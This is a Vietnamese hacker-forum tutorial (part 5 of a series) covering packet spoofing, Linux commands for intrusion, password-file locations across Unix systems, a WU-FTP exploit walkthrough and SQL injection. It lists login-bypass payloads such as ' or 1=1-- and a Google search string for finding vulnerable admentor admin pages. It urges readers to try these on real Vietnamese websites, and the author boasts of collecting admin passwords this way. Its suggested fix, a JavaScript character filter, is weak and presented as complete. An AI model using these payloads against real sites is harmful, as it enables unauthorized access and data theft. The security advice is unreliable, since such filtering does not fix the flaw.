Những hiểu
biết cơ bản nhất để trở thành Hacker - Phần 5
31 . ) Gói tin TCP/IP là gì?
TCP/IP viết tắt cho
Transmission Control Protocol and Internet Protocol, một Gói tin TCP/IP là một
khối dữ liệu đã được nén, sau đó kèm thêm một header và gửi đến một máy tính
khác. Đây là cách thức truyền tin của internet, bằng cách gửi các gói tin. Phần
header trong một gói tin chứa địa chỉ IP của người gửi gói tin. Bạn có thể viết
lại một gói tin và làm cho nó trong giống như đến từ một người khác!! Bạn có thể
dùng cách này để tìm cách truy nhập vào rất nhiều hệ thống mà không bị bắt. Bạn
sẽ phải chạy trên Linux hoặc có một chương trình cho phép bạn làm điều này.
32 . ) Linux là gi`:
_Nói theo nghĩa gốc, Linux là
nhân ( kernel ) của HĐH. Nhân là 1 phần mềm đảm trách chức vụ liên lạc giữa các
chương trình ứng dụng máy tính và phần cứng. Cung cấp các chứng năng như: quản
lý file, quản lý bộ nhớ ảo, các thiết bị nhập xuất nhưng ổ cứng, màn hình, bàn
phím, .... Nhưng Nhân Linux chưa phải là 1 HĐH, vì thế nên Nhân Linux cần phải
liên kết với những chương trình ứng dụng được viết bởi tổ chức GNU tạo lên 1 HĐH
hoàn chỉnh: HĐH Linux. Đây cũng là lý do tại sao chúng ta thấy GNU/Linux khi
được nhắc đến Linux.
Tiếp theo, 1 công ty hay 1 tổ chức đứng ra đóng gói các
sản phẩm này ( Nhân và Chương trình ứng dụng ) sau đó sửa chữa một số cấu hình
để mang đặc trưng của công ty/ tổ chức mình và làm thêm phần cài đặt (
Installation Process ) cho bộ Linux đó, chúng ta có : Distribution. Các
Distribution khác nhau ở số lượng và loại Software được đóng gói cũng như quá
trình cài đặt, và các phiên bản của Nhân. 1 số Distribution lớn hiện nay của
Linux là : Debian, Redhat, Mandrake, SlackWare, Suse .
33 . ) Các
lệnh căn bản cần biết khi sử dụng hoặc xâm nhập vào hệ thống Linux :
_ Lệnh `` man`` : Khi bạn muốn biết cách sử dụng lệnh nào thì có thể
dùng tới lệnh nay :
Cấu trúc lệnh : $ man .
Ví dụ : $ man man
_ Lệnh
`` uname ``: cho ta biết các thông tin cơ bản về hệ thống
Ví dụ : $uname -a
; nó sẽ đưa ra thông tin sau :
Linux gamma 2.4.18 #3 Wed Dec 26 10:50:09
ICT 2001 i686 unknown
_ Lệnh id : xem uid/gid hiện tại ( xem nhóm và tên
hiện tại )
_ Lệnh w : xem các user đang login và action của họ trên hệ
thống .
Ví Dụ : $w nó sẽ đưa ra thông tin sau :
10:31pm up 25 days,
4:07, 18 users, load average: 0.06, 0.01, 0.00
_ Lệnh ps: xem thông tin
các process trên hệ thống
Ví dụ : $ps axuw
_ Lệnh cd : bạn muốn di
chuyển đến thư mục nào . phải nhờ đến lệnh này .
Ví du : $ cd /usr/bin ----
> nó sẽ đưa bạn đến thư mục bin
_ Lệnh mkdir : tạo 1 thư mục .
Ví dụ
: $ mkdir /home/convit --- > nó sẽ tạo 1 thư mục convit trong /home
_
Lệnh rmdir : gỡ bỏ thư mục
Ví dụ : $ rmdir /home/conga ---- > nó sẽ gỡ bỏ
thư mục conga trong /home .
_ Lệnh ls: liệt kê nội dung thư mục
Ví dụ :
$ls -laR /
_ Lệnh printf: in dữ liệu có định dạng, giống như sử dựng
printf() của C++ .
Ví dụ : $printf %s ``\x41\x41\x41\x41``
_ Lệnh pwd:
đưa ra thư mục hiện hành
Ví dụ : $pwd ------ > nó sẽ cho ta biết vị trí
hiện thời của ta ở đâu : /home/level1
_ Các lệnh : cp, mv, rm có nghĩa là :
copy, move, delete file
Ví dụ với lệnh rm (del) : $rm -rf /var/tmp/blah
----- > nó sẽ del file blah .
Làm tương tự đối với các lệnh cp , mv .
_ Lệnh find : tìm kiếm file, thư mục
Ví dụ : $find / -user level2
_
Lệnh grep: công cụ tìm kiếm, cách sử dụng đơn giản nhất : grep ``something``
Vidu : $ps axuw | grep ``level1``
_ Lệnh Strings: in ra tất cả các ký tự
in được trong 1 file. Dùng nó để tìm các khai báo hành chuỗi trong chương trình,
hay các gọi hàm hệ thống, có khi tìm thấy cả password nữa
VD: $strings
/usr/bin/level1
_ Lệnh strace: (linux) trace các gọi hàm hệ thống và signal,
cực kỳ hữu ích để theo dõi flow của chương trình, cách nhanh nhất để xác định
chương trình bị lỗi ở đoạn nào. Trên các hệ thống unix khác, tool tương đương là
truss, ktrace .
Ví dụ : $strace /usr/bin/level1
_ Lệnh`` cat, more ``:
in nội dung file ra màn hình
$cat /etc/passwd | more -- > nó sẽ đưa
ra nội dung file passwd một cách nhanh nhất .
$more /etc/passwd ---- > Nó
sẽ đưa ra nội dung file passwd một cách từ từ .
_ Lệnh hexdump : in ra
các giá trị tương ứng theo ascii, hex, octal, decimal của dữ liệu nhập vào .
Ví dụ : $echo AAAA | hexdump
_ Lệnh : cc, gcc, make, gdb: các công cụ
biên dịch và debug .
Ví dụ : $gcc -o -g bof bof.c
Ví dụ : $make bof
Ví dụ : $gdb level1
(gdb) break main
(gdb) run
_ Lệnh perl: một
ngôn ngữ
Ví dụ : $perl -e `print ``A``x1024` | ./bufferoverflow ( Lỗi tràn
bộ đệm khi ta đánh vào 1024 kí tự )
_ Lệnh ``bash`` : đã đến lúc tự động hoá
các tác vụ của bạn bằng shell script, cực mạnh và linh hoạt .
Bạn muốn tìm
hiểu về bash , xem nó như thế nào :
$man bash
_ Lệnh ls : Xem nội dung
thư mục ( Liệt kê file trong thư mục ) .
Ví Dụ : $ ls /home ---- > sẽ
hiện toàn bộ file trong thư mục Home
$ ls -a ----- > hiện toàn bộ file ,
bao gồm cả file ẩn
$ ls -l ----- > đưa ra thông tin về các file
_
Lệnh ghi dữ liệu đầu ra vào 1 file :
Vídụ : $ ls /urs/bin > ~/convoi
------ > ghi dữ liệu hiển thị thông tin của thư mục bin vào 1 file convoi .
34 . ) Những hiểu biết cơ bản xung quanh Linux :
a . )
Một vài thư mục quan trọng trên server :
_ /home : nơi lưu giữ các file người sử
dụng ( VD : người đăng nhập hệ thống có tên là convit thì sẽ có 1 thư mục là
/home/convit )
_ /bin : Nơi xử lý các lệnh Unix cơ bản cần thiết như ls
chẳng hạn .
_ /usr/bin : Nơi xử lý các lệnh dặc biệt khác , các lệnh dùng
bởi người sử dụng đặc biệt và dùng quản trị hệ thống .
_ /bot : Nơi mà
kernel và các file khác được dùng khi khởi động .
_ /ect : Các file hoạt
động phụ mạng , NFS (Network File System ) Thư tín ( Đây là nơi trọng yếu mà
chúng ta cần khai thác nhiều nhất )
_ /var : Các file quản trị
_
/usr/lib : Các thư viện chuẩn như libc.a
_ /usr/src : Vị trí nguồn của các
chương trình .
b . ) Vị trí file chứa passwd của một số phiên bản
khác nhau :
CODE
AIX 3 /etc/security/passwd !/tcb/auth/files//
A/UX 3.0s /tcb/files/auth/?/*
BSD4.3-Ren /etc/master.passwd *
ConvexOS 10 /etc/shadpw *
ConvexOS 11 /etc/shadow *
DG/UX
/etc/tcb/aa/user/ *
EP/IX /etc/shadow x
HP-UX /.secure/etc/passwd *
IRIX 5 /etc/shadow x
Linux 1.1 /etc/shadow *
OSF/1
/etc/passwd[.dir|.pag] *
SCO Unix #.2.x /tcb/auth/files//
SunOS4.1+c2
/etc/security/passwd.adjunct ##username
SunOS 5.0 /etc/shadow
System V
Release 4.0 /etc/shadow x
System V Release 4.2 /etc/security/* database
Ultrix 4 /etc/auth[.dir|.pag] *
UNICOS /etc/udb *
35 . )
Khai thác lỗi của Linux qua lỗ hổng bảo mật của WU-FTP server :
_ WU-FTP Server (được phát triển bởi đại Học Washington ) là một phần
mềm Server phục vụ FTP được dùng khá phổ biến trên các hệ thống Unix & Linux
( tất cả các nhà phân phối: Redhat, Caldera, Slackware, Suse, Mandrake....) và
cả Windows.... , các hacker có thể thực thi các câu lệnh của mình từ xa thông
qua file globbing bằng cách ghi đè lên file có trên hệ thống .
_ Tuy nhiên ,
việc khai thác lỗi này không phảI là dễ vì nó phải hội đủ những điều kiện sau :
+ Phải có account trên server .
+ Phải đặt được Shellcode vào trong bộ
nhớ Process của Server .
+ Phải gửi một lệnh FTP đặc biệt chứa đựng một
globbing mẫu đặc biệt mà không bị server phát hiện có lỗi .
+ Hacker sẽ ghi
đè lên một Function, Code tới một Shellcode, có thể nó sẽ được thực thi bới
chính Server FTP .
_ Ta hãy phân tích VD sau về việc ghi đè lên file của
server FTP :
CODE
ftp > open localhost <== lệnh mở trang bị
lỗi .
Connected to localhost (127.0.0.1).
220 sasha FTP server (Version
wu-2.6.1-18) ready <== xâm nhập thành công FTP server .
Name
(localhost:root): anonymous <== Nhập tên chỗ này
331 Guest login ok, send
your complete e-mail address as password.
Password:………..<== nhập mật khẩu
ở đây
230 Guest login ok, access restrictions apply.
Remote system type
is UNIX.
Using binary mode to transfer files. <== sử dụng biến nhị phân
để chuyển đổi file .
ftp > ls ~{ <== lệnh liệt kê thư mục hiện hành .
227 Entering Passive Mode (127,0,0,1,241,205)
421 Service not available,
remote server has closed connection
1405 ? S 0:00 ftpd: accepting
connections on port 21 ç chấp nhận kết nốI ở cổng 21 .
7611 tty3 S 1:29 gdb
/usr/sbin/wu.ftpd
26256 ? S 0:00 ftpd:
sasha:anonymous/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
26265 tty3 R 0:00 bash -c
ps ax | grep ftpd
(gdb) at 26256
Attaching to program:
/usr/sbin/wu.ftpd, process 26256 <== khai thác lỗi Wu.ftpd .
Symbols
already loaded for /lib/libcrypt.so.1
Symbols already loaded for
/lib/libnsl.so.1
Symbols already loaded for /lib/libresolv.so.2
Symbols
already loaded for /lib/libpam.so.0
Symbols already loaded for
/lib/libdl.so.2
Symbols already loaded for /lib/i686/libc.so.6
Symbols
already loaded for /lib/ld-linux.so.2
Symbols already loaded for
/lib/libnss_files.so.2
Symbols already loaded for /lib/libnss_nisplus.so.2
Symbols already loaded for /lib/libnss_nis.so.2
0x40165544 in
__libc_read () from /lib/i686/libc.so.6
(gdb) c
Continuing.
Program
received signal SIGSEGV, Segmentation fault.
__libc_free (mem=0x61616161) at
malloc.c:3136
3136 in malloc.c
Việc khai thác qua lỗi này đến
nay tôi test vẫn chưa thành công ( chẳng biết làm sai chỗ nào ) . Vậy bạn nào
làm được hãy post lên cho anh em biết nhé .
Lỗi Linux hiện nay rất ít ( đặc
biệt là đối với Redhat ), các bạn hãy chờ đợi nếu có lỗi gì mới thì bên “LỗI bảo
mật” sẽ cập nhật ngay . Khai thác chúng như thế nào thì hỏi Mod quản lý bên đó ,
đặc biệt là bạn Leonhart , cậu ta siêng trả lời các bạn lắm .
( Dựa theo
bài viết của huynh Binhnx2000 )
36 . ) Tìm hiểu về SQL Injection :
_ SQL Injection là một trong những kiểu hack web đang dần trở nên
phổ biến hiện nay. Bằng cách inject các mã SQL query/command vào input trước khi
chuyển cho ứng dụng web xử lí, bạn có thể login mà không cần username và
password, thi hành lệnh từ xa, đoạt dữ liệu và lấy root của SQL server. Công cụ
dùng để tấn công là một trình duyệt web bất kì, chẳng hạn như Internet Explorer,
Netscape, Lynx, ...
_ Bạn có thể kiếm được trang Web bị lỗi bằng cách dùng
các công cụ tìm kiếm để kiếm các trang cho phép submit dữ liệu . Một số trang
Web chuyển tham số qua các khu vực ẩn nên bạn phảI viewsource mớI thấy được . VD
ta xác định được trang này sử dụng Submit dữ liệu nhờ nhìn vào mã mà ta đã
viewsource :
CODE
<input type=hidden name=A value=C >
_ Kiểm tra thử xem trang Web có bị lỗi này hay không bằng
cách nhập vào login và pass lân lượt như sau :
- Login: hi` or 1=1--
- Pass: hi` or 1=1--
Nếu không được bạn thử tiếp với các login và
pass sau :
CODE
` or 1=1--
`` or 1=1--
or 1=1--
` or
`a`=`a
`` or ``a``=``a
`) or (`a`=`a
Nếu thành công, bạn có
thể login vào mà không cần phải biết username và password .
Lỗi này có dính
dáng đến Query nên nếu bạn nào đã từng học qua cơ sở dữ liệu có thể khai thác dễ
dàng chỉ bằng cách đánh các lệnh Query trên trình duyệt của các bạn . Nếu các
bạn muốn tìm hiểu kỹ càng hơn về lỗi này có thể tìm các bài viết của nhóm vicky
để tìm hiểu thêm .
37 . ) Một VD về hack Web thông qua lỗi admentor (
Một dạng của lỗi SQL Injection ) :
_ Trước tiên bạn vào google.com
tìm trang Web admentor bằng từ khoá “allinurl : admentor” .
_ Thông thường
bạn sẽ có kết quả sau :
http://www.someserver.com/admentor /admin/admin.asp
_
Bạn thử nhập “ ` or ``=` ” vào login và password :
CODE
Login : ` or
``=`
Password : ` or ``=`
_ Nếu thành công bạn sẽ xâm nhập vào
Web bị lỗi với vai trò là admin .
_ Ta hãy tìm hiểu về cách fix lỗi này nhé
:
+ Lọc các ký tự đặc biệt như “ ` `` ~ \ ” bằng cách chêm vào javascrip
đoạn mã sau :
CODE
function RemoveBad(strTemp)
{
strTemp =
strTemp.replace(/\<|\ > |\``|\`|\%|\;|\(|\)|\&|\+|
\-/g,````);
return strTemp;
}
+ Và gọi nó từ bên trong của asp script :
CODE
var login = var TempStr = RemoveBad
(Request.QueryString(``login``));
var password = var TempStr = RemoveBad
(Request.QueryString(``password``));
_ Vậy là ta đã fix xong lỗi
.
_ Các bạn có thể áp dụng cách hack này cho các trang Web khác có submit dữ
liệu , các bạn hãy test thử xem đi , các trang Web ở Việt Nam mình bị nhiều lắm
, tôi đã kiếm được kha khá pass admin bằng cách thử này rồi ( nhưng cũng đã báo
để họ fix lại ) .
_ Có nhiều trang khi login không phải bằng “ ` or ``=’ ”
mà bằng các nick name có thật đã đăng ký trên trang Web đó , ta vào link “thành
viên” kiếm nick của một admin để test thử nhé .
Hack vui vẻ .
================================================== = =
Ở phần 6
tôi sẽ đề cập đến kiểu tấn công từ chối dịch vụ ( DoS attack ) , một kiểu tấn
công lợi hại đã làm cho trang Web hùng mạnh như HVA của chúng ta bị tắt nghẽn
chỉ trong thờI gian ngắn các admin bận đi uống cafe hết mà không ai trông coi .
Kèm theo đó là các phương pháp tấn công DoS đã và đang được sử dụng .
GOOKLUCK!!!!!!!!!!!!!!!!!!!!
